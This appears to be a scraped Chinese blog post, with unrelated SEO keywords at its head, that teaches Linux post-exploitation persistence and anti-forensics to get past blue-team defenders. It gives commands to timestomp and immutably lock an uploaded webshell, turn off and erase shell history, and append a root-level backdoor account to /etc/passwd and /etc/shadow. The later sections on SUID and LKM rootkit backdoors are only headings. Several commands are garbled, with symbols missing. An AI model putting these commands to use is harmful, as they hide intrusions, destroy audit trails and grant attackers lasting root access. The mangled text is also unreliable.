万网做网站,上海家装公司十大排名,wordpress vip解析插件,微信推广网站建设一、修改文件/终端的属性1、修改文件创建时间如果蓝队是按照文件修改时间来判断后门的话#xff0c;比如现在我们上传一个shell#xff0c;可以看到shell文件与原文件的时间是不同的解决方法#xff1a;touch -r teamserver shell.php现在再来看原文件与shell文件的修改时间…一、修改文件/终端的属性1、修改文件创建时间如果蓝队是按照文件修改时间来判断后门的话比如现在我们上传一个shell可以看到shell文件与原文件的时间是不同的解决方法touch -r teamserver shell.php现在再来看原文件与shell文件的修改时间就会看得到执行命令后的shell文件时间与原文件一致了Linux touch命令用于修改文件或者目录的时间属性包括存取时间和更改时间。若文件不存在系统会建立一个新的文件。ls -l 可以显示档案的时间记录。2、文件锁定在Linux中使用chattr命令设置文件属性使得root用户和其他管理员用户也无法修改删除文件此权限用ls -l是无法查到的达到隐藏权限的作用。chattr i shell.php #不得任意更改文件或目录lsattr shell.php #虽然ls -l无法查到但lsattr可以显示文件属性当我们执行了chattr命令后即使是root权限也不能删除或者移动文件解除锁定属性chattr -i shell.php #解除属性lsattr shel.php这时候才能作改动3、历史记录在Linux系统中使用history命令可以查看历史记录如何能让自己的操作不被记录在历史记录中呢解决方法1关闭历史记录[space]set o history #[space]表示空格加一个空格在前面这条命令就不会被记录在执行了这条命令之后的所有操作都不会被记录知道解除关闭历史记录set -o history #恢复系统环境(测试了下只要在命令前加一个空格都不会被记录到history中这也算一种解决方法噢)解决方法2删除历史记录history -c #清除本次留在缓存中的所有操作记录但其实在 ~/.bash_history文件中记录了所有的操作记录想要删除的更彻底的话可以直接删除这个文件里的记录大规模删除只留.bash_history文件中的前十行sed -i 10,$d .bash_history4、passwd写入/etc/passwd 各部分含义用户名密码用户ID组ID身份描述用户的家目录用户登录后所使用的SHELL/etc/shadow 各部分含义用户名密码的MD5加密值自系统使用以来口令被修改的天数口令的最小修改间隔口令更改的周期口令失效的天数口令失效以后帐号会被锁定多少天用户帐号到期时间保留字段尚未使用栗子1、增加超级用户rootkali:~# perl -le print crypt(jiuguan,salt)saZgF2xQK4016rootkali:~# echo jiuguan:saZgF2xQK4016:hacker:/root:/bin/bash /etc/passwd2、如果系统不允许uid0的用户登录那么可以增加一个普通用户rootkali:~# echo jiuguan:saZgF2xQK4016:-1:-1:-1:-1:-1:-1:500 /etc/shadow二、SUID后门???三、LKM Linux rootKit后门